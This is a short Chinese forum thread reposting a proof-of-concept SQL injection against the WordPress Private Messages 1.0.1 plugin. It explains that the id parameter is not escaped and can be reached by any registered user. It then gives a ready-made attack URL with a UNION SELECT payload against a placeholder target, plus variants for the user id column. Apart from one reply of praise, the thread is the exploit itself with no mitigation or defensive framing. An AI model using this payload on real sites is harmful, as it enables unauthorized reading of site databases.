90_ 发表于 2016-12-20 23:18:49

Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞

1 - Description:

Type user access: registered user.
$_GET[‘id’] is not escaped. Url is accessible for every registered user.


2 - Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 -Using :

http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved

Obs: Use id number of your user in third column after word select. For example:

…UNION+SELECT+1,2,1,name,slug…

…UNION+SELECT+1,2,2,name,slug…

…UNION+SELECT+1,2,3,name,slug…

…UNION+SELECT+1,2,4,name,slug…

…UNION+SELECT+1,2,5,name,slug…

秋凉雨夜 发表于 2016-12-21 21:27:19

666666   
页: [1]
查看完整版本: Wordpress Private Messages 1.0.1 Plugin - SQL注入漏洞